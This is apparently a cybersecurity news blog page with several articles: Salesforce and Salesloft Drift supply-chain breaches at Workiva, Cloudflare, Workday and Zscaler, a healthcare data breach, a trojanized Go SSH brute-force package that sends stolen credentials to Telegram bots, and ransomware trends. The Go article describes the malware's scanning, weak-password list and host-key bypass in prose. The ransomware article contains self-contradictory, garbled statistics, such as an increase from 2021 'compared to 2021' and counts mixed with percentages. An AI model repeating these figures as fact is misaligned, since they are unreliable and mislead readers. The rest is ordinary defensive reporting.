Over 6,300 customers are included in the company, including 85 percent of Fortune 500 companies and prominent names like Google, T-Mobile, Delta Air Lines, Wayfair, Hershey, and Mercedes-Benz, so the company stressed the importance of staying vigilant and warned that the stolen data could be used to conduct spear-phishing scams. 

It was reiterated that Workiva would never solicit sensitive information by text or phone, nor would it seek to communicate with customers through official channels other than its trusted support channels, as a means of reassuring customers. Due to the fact that even the most prominent security vendors were not spared from the wave of intrusions, the cybersecurity community has been on their toes due to the wave of intrusions. 

A simple example of this, Cloudflare, reported that attackers bypassed traditional social engineering by exploiting credential compromises linked to Salesloft Drift, one of the third-party applications that are integrated with Salesforce, instead of taking advantage of traditional social engineering techniques. 

Using this access, threat actors were able to infiltrate Cloudflare's Salesforce environment on August 12, and spend two days mapping the system before conducting a rapid exfiltration operation which, within minutes of the operation, sucked off sensitive data, deleted log files and attempted to erase digital traces. 

Earlier, Palo Alto Networks confirmed that a similar breach had occurred during the period between August 8 and 18, with attackers leveraging stolen OAuth tokens to gain access to the Salesforce system that the Salesforce integration was integrated into. In this period, adversaries were able to extract customer contact information, sales records, and case data. 

After obtaining these items, the adversaries later scanned the stolen data for passwords and cloud service credentials, which were used to facilitate secondary attacks targeting AWS and Snowflake platforms. Analysts point out that these incidents do not imply that core defences have collapsed, but rather that trust dependencies within digital ecosystems are fragile. 

With the use of weak access controls and third-party connections, groups like Scattered Spider, Lapsus$, and ShinyHunters have exploited stolen data and ransom profits on underground channels to make a profit, raising the concern that a much bigger scope of exposure may be uncovered than has been revealed.

Despite being one of the world's largest HR software providers, Workday has confirmed that it also became a victim of a cyberattack campaign utilizing Salesforce's customer relationship management platform. There is a possibility that the incident, which was first reported on August 6, could have impacted the personal information of up to 70 million individuals as well as 11,000 corporate clients' business information. 

Despite Workday stressing that its core HR systems that are known as customer tenants remain unaffected by this attack, it admits that attackers were able to access business contact details in its Salesforce integration, including names, email addresses, phone numbers, and facsimiles. A growing list of victims has included Google, Cisco, Qantas, and Pandora as well as other large companies. 

The breach underscores how adversaries are increasingly targeting third-party service providers that are acting as gateways to vast amounts of personal data. As roughly 60% of Fortune 500 companies use Workday's platform for their digital supply chains, the incident emphasizes the risks involved in a digital supply chain that is interconnected. 

A number of security experts have warned that these SaaS and CRM systems, which were once treated as routine business tools, have now become very valuable attack surfaces for cyber criminals. As analysts point out that ShinyHunters seems to be the likely culprit, attention has now turned to their tactics, namely, phishing campaigns designed to trick employees into giving them their credentials by impersonating HR and IT staff. 

The breach has reignited debate among cybersecurity professionals regarding whether the breaches indicate the development of sophisticated social engineering techniques, or whether they reveal persistent shortcomings in organizational awareness and training. In light of the string of breaches tied to Salesforce integrations, enterprises have reached the point of reassessing, monitoring, and securing third-party platforms that are woven into the daily operation of their companies. 

The incidents were unprecedented in their scope and severity, and although some companies haven't been able to contain the fallout as quickly as others has, the incidents illustrate that even some of the most trusted vendors cannot be made to appear invulnerable. The majority of cybersecurity specialists believe that organizations need to build a wider security posture beyond perimeter defense, including vendor risk management and zero-trust frameworks, as well as tighter controls on identity and access. 

Auditing integrations on a regular basis, minimizing permissions granted through OAuth, and monitoring API usage are no longer optional safeguards, but are strategic imperatives in an environment where many attackers thrive on exploiting overlooked trust relationships in order to achieve the greatest possible gain. 

Additionally, greater focus on employee awareness about spear-phishing and impersonation schemes can be a critical component in reducing the chances of credential theft, which is an entry point that appears to be becoming more prevalent each year. In the case of organizations reliant on SaaS ecosystems, the lesson is clear - securing extended supply chains is as important as protecting internal infrastructure as it is in keeping business resilient, and the adaptors will be the ones best positioned to withstand the next wave of attack.
Read more »
SSN leak
Data Breach Experian credit monitoring financial data exposure Healthcare HSGI cyberattack identity theft protection SSN leak

Over 624,000 Impacted in Major Healthcare Data Breach: SSNs, Financial Data, and Identity Theft Risks

 


A massive healthcare data breach has exposed the sensitive information of more than 624,000 individuals, putting Social Security numbers, financial details, and account credentials at risk.

The breach targeted Healthcare Services Group Inc. (HSGI), a Pennsylvania-based company that manages dining, housekeeping, and laundry services for hospitals across 48 U.S. states. According to BleepingComputer, HSGI has begun notifying impacted individuals through official letters.

Hackers infiltrated HSGI’s network in late September 2024, but the intrusion wasn’t discovered until October 7, 2024. An investigation revealed that a wide range of personal data may have been compromised, including:
  • Full names
  • Social Security numbers
  • Driver’s license and state ID numbers
  • Financial account details
  • Login credentials

The type of data exposed varies for each victim. Some may only have had their names leaked, while others also had SSNs and financial data exposed.

If you receive a data breach notification letter from HSGI, it will outline exactly what information of yours was exposed. The company is offering affected individuals free identity theft protection services from Experian, though the coverage period (12 months vs. 24 months) has not been confirmed.

Even though there’s no evidence yet of misuse of stolen data, experts warn that hackers could use the information for phishing attacks, fraud, or identity theft. Victims are urged to:
  • Monitor bank and credit card accounts closely
  • Watch for suspicious emails or texts
  • Avoid clicking unknown links or downloading attachments
  • Use trusted antivirus software on all devices

The healthcare industry has become a prime target for cybercriminals due to the high value of medical and financial records. Analysts believe this will not be the last attack of its kind, as similar breaches have been reported throughout the past year.

While individuals cannot control a company’s cybersecurity, they can take proactive measures once a breach occurs. As experts warn: You may not stop the breach, but you can protect yourself from becoming the next victim of identity fraud.
Read more »
trending news
cybersecurity news Data Breach data breach news trending news

Zscaler Confirms Exposure in Salesloft-Linked Data Breach

 

Zscaler has confirmed that it is among the latest organizations to be impacted by a major supply chain attack exploiting the Salesloft Drift application, which integrates with Salesforce. 

According to the company, attackers managed to steal OAuth tokens tied to the third-party app, giving them access to Zscaler’s Salesforce environment. The security vendor explained that the compromised data mainly consisted of business-related information rather than sensitive personal or financial records. Specifically, the exposed details included names, work email addresses, job titles, phone numbers, location data, licensing and commercial details relating to Zscaler products, as well as plain-text content from certain customer support cases. However, Zscaler emphasized that no attachments, files, or images were accessed in the incident. 

Upon detecting the unauthorized activity, the company acted quickly by revoking the Drift app’s access and rotating other API tokens as a precaution. In addition, it claimed to have put in place new safeguards and strengthened protocols to reduce the likelihood of similar breaches in the future. 

While Zscaler noted that the incident appeared limited in scope and said there is no evidence so far of any misuse of the exposed data, it urged customers to exercise extra caution. The company warned that malicious actors could exploit the stolen information for phishing campaigns or social engineering attacks, and therefore advised clients to be vigilant about unsolicited emails, calls, or requests for confidential information. 

This breach is part of a wider campaign being tracked by security researchers as UNC6395, which is said to have compromised numerous Salesforce customer environments between August 8 and August 18. The attackers reportedly exfiltrated large volumes of customer data during that period, potentially affecting hundreds of organizations. 

More recently, it has also been revealed that the same campaign targeted a limited number of Google Workspace accounts through Salesloft Drift integrations, further underlining the scope of the threat. Given the scale and operational sophistication demonstrated, some experts have speculated that a nation-state threat actor could be behind the attacks. 

Zscaler’s disclosure follows similar admissions from other companies caught in the same campaign, highlighting the continuing risks posed by supply chain compromises in cloud-based business ecosystems.
Read more »
Open Source
Brute-force attack Credential stealing Data Breach data security Data Theft Golang Malicious Bots Open Source

Malicious Go Package Disguised as SSH Tool Steals Credentials via Telegram

 

Researchers have uncovered a malicious Go package disguised as an SSH brute-force tool that secretly collects and transmits stolen credentials to an attacker-controlled Telegram bot. The package, named golang-random-ip-ssh-bruteforce, first appeared on June 24, 2022, and was linked to a developer under the alias IllDieAnyway. Although the GitHub profile tied to this account has since been removed, the package is still accessible through Go’s official registry, raising concerns about supply chain security risks for developers who might unknowingly use it. 

The module is designed to scan random IPv4 addresses in search of SSH services operating on TCP port 22. Once it detects a running service, it attempts brute-force login using only two usernames, “root” and “admin,” combined with a list of weak and commonly used passwords. These include phrases such as “root,” “test,” “password,” “admin,” “12345678,” “1234,” “qwerty,” “webadmin,” “webmaster,” “techsupport,” “letmein,” and “Passw@rd.” If login succeeds, the malware immediately exfiltrates the target server’s IP address, username, and password through Telegram’s API to a bot called @sshZXC_bot, which forwards the stolen information to a user identified as @io_ping. Since Telegram communications are encrypted via HTTPS, the credential theft blends into ordinary web traffic, making detection much more difficult. 

The design of the tool helps it remain stealthy while maximizing efficiency. To bypass host identity checks, the module disables SSH host key verification by setting ssh.InsecureIgnoreHostKey as its callback. It continuously generates IPv4 addresses while attempting concurrent logins in an endless loop, increasing the chances of finding vulnerable servers. Interestingly, once it captures valid credentials for the first time, the malware terminates itself. This tactic minimizes its exposure, helping it avoid detection by defenders monitoring for sustained brute-force activity. 

Archival evidence suggests that the creator of this package has been active in the underground hacking community for years. Records link the developer to the release of multiple offensive tools, including an IP port scanner, an Instagram parser, and Selica-C2, a PHP-based botnet for command-and-control operations. Associated videos show tutorials on exploiting Telegram bots and launching SMS bomber attacks on Russian platforms. Analysts believe the attacker is likely of Russian origin, based on the language, platforms, and content of their activity. 

Security researchers warn that this Trojanized Go module represents a clear supply chain risk. Developers who unknowingly integrate it into their projects could unintentionally expose sensitive credentials to attackers, since the exfiltration traffic is hidden within legitimate encrypted HTTPS connections. This case underscores the growing threat of malicious open-source packages being planted in widely used ecosystems, where unsuspecting developers become conduits for large-scale credential theft.
Read more »
Threat actors
Business Resilience cybersecurity risks Data Breach Generative AI Ransomware Surge State-Sponsored Attacks Threat actors

Cybersecurity Landscape Shaken as Ransomware Activity Nearly Triples in 2024

 


Ransomware is one of the most persistent threats in the evolving landscape of cybercrime, but its escalation in 2024 has marked an extremely alarming turning point. Infiltrating hospitals, financial institutions, and even government agencies in a manner that has never been attempted before, attackers extended their reach with unprecedented precision, as if they were no longer restricted to high-profile corporations. These sectors tend to be vulnerable to such crippling disruptions in the first place. 

As cybercriminals employed stronger encryption methods and more aggressive extortion tactics, they demonstrated a ruthless pursuit of maximising damages and financial gain. This shift is demonstrated in the newly released data from threat intelligence firm Flashpoint, which reveals that the number of ransomware attacks observed in the first half of 2025 increased by 179 per cent in comparison to 2024 during the same period, almost tripling in size in just a year. 

Throughout the years 2022 and 2023, the ransomware landscape offered little relief due to the relentless escalation of threat actors’ tactics. As a result of the threat of public exposure and data infiltration, attackers increasingly used threats of data infiltration to force companies to conform to regulations. 

Even companies that managed to restore their operations from backups were not spared, as sensitive information was often leaking onto underground forums and leak sites controlled by criminal groups, which led to an increase in ransomware incidence of 13 per cent in 2021 compared to 2021 – an increase far greater than the cumulative increases of the past five years combined. 

Verizon’s Data Breach Investigations Report underscored the severity of this trend. It is important to note that Statista has predicted that about 70 per cent of businesses will face at least one ransomware attack in 2022, marking the highest rate of ransomware attacks ever recorded. In the 2022 year-over-year analysis, it was highlighted that education, government, and healthcare were the industries with the greatest impact in 2022. 

By 2023, healthcare will emerge as one of the most targeted sectors due to attackers' calculated strategy to target industries that are least able to sustain prolonged disruption. In light of the ongoing ransomware crisis, small and mid-sized businesses are considered to be some of the most vulnerable targets. 

As part of Verizon’s research, 832 ransomware-related incidents were documented by small businesses by 2022, 130 of these incidents resulted in confirmed data loss, and nearly 80 per cent of these events were directly related to the ransomware attacks. In an effort to compound the risks, the fact that only half of U.S. small businesses maintain a formal cybersecurity plan, according to a report quoted by UpCity Globally, amplifies the risks. 

A survey conducted by Statista found that 72 per cent of businesses were impacted by ransomware, with 64.9% of those organisations ultimately yielding to ransom demands. In a recent survey of 1,500 cybersecurity professionals conducted by Cyberreason, there was a similar picture of concern. More than two-thirds of all organisations reported experiencing a ransomware attack, a 33 per cent increase over the previous year, with almost two-thirds of the attacks associated with compromised third parties. 

The consequences for organisations were severe and went beyond financial losses in the most significant way. Approximately 40% of companies had to lay off employees following an attack, 35 percent reported resignations of senior executives, and one third temporarily suspended operations as a result of an attack. 

Unfortunately, the persistence of attackers within networks often went undetected for long periods of time. There was a reported 63 per cent of organisations that had been attacked for as long as six months, and others reported that they had been accessed for a period of over a year without being noticed. The majority of companies decided to pay ransoms despite the risks involved, with 49 per cent doing so to avoid revenue losses and 41 per cent to speed up recovery. 

In spite of this, even payment provided no guarantee of data recovery; over half of all companies paying ransom reported corrupted or unusable data after the decryption, while the majority of financial damages were between $1 million and $10 million. The use of generative artificial intelligence within ransomware operations is also an emerging concern. 

Even though the scope of these experiments remains limited, some groups have begun to explore large language models that have the potential to reduce operational burdens, such as automating the generation of phishing templates.To develop a more comprehensive understanding of this capability, researchers have identified Funksec, a group that surfaced in late 2024 and is believed to have contributed to the WormGPT model, as one of the first groups to experiment with it, so more gangs will likely start incorporating artificial intelligence into their tactics in the near future.

Furthermore, analysts at Flashpoint found that gang members are recycling victims from other ransomware groups in order to gain a foothold on underground forums, long after initial breaches. The first half of 2025 has been dominated by a few particularly active operators based on scale: 537 attacks were committed by Akira, 402 attacks were committed by Clop/Cl0p, 345 attacks were committed by Qilin, 233 attacks were committed by Safepay Ransomware, and 23 attacks were performed by RansomHub. 

A significant amount of attention has also been drawn to DragonForce in the United Kingdom after the company targeted household names, including Marks & Spencer and the Co-op Group. Despite being the top target, the United States remained the most vulnerable, with 2,160 attacks, far exceeding Canada’s 249 attacks, Germany’s 154 attacks, and the UK’s 148 attacks—but Brazil, Spain, France, India, and Australia also had high numbers. 

A perspective from the manufacturing and technology industries indicates that these were the industries that were most lucrative, causing 22 and 18 per cent of incidents, respectively. Retail, healthcare, and business services, on the other hand, accounted for 15 per cent. The report also highlighted how the boundaries between hacktivist groups and state-sponsored actors are becoming increasingly blurred, thus illustrating the complexity of today's threat environment. 

During the first half of 2025, 137 threat actor activities tracked were attributed to state-sponsored groups, 9 per cent to hacktivists, while the remaining 51 per cent were attributed to cybercriminal organisations. The Iranian government has shown that a growing focus has been placed on critical infrastructure through entities affiliated with the Iranian state, such as GhostSec and Arabian Ghosts. 

In an attempt to target critical infrastructure, these entities are reported to have targeted programmable logic controllers connected to Israeli media and water systems. As a result, groups such as CyberAv3ngers sought to spread unverified narratives in advance of disruptive technology attacks. As a result, state-aligned operations are often resurfacing under a new identity, such as APT IRAN, demonstrating their shifting strategies and adaptive nature. 

There is a sobering picture of the challenges that lie ahead in light of the increase in ransomware activity as well as the diversification of threat actors. Even though no sector, geography, or organisation size is immune to disruption, it appears that cybercriminals will be able to innovate more rapidly than ever, as well as utilise state-linked tactics to do so in the future, which indicates that the stakes will only get higher as time goes on. 

Proactively managing security goes beyond ensuring compliance or minimising damage; it involves cultivating a culture of security that anticipates threats rather than reacts to them, rather than merely reacting to them. By investing in modern defences like continuous threat intelligence, real-time monitoring, and zero-trust architectures, as well as addressing fundamental weaknesses in supply chains and third-party partnerships, which frequently open themselves up to attacks, companies can significantly reduce their risk exposure as well as their vulnerability to attacks. 

Moreover, it is equally important to address the human aspect of cybersecurity resilience: employees must be aware, incidents should be reported quickly, and leadership needs to be committed to cybersecurity resilience. 

Even though the outlook may seem daunting, organisations that make sure they are prepared rather than complacent will have a better chance of dealing with ransomware as well as the wider range of cyber threats that are reshaping the digital age. A resilient security approach remains the ultimate defence in an environment defined by a persistent attacker and the innovative actions of the attacker.
Read more »
Subscribe to: Posts (Atom)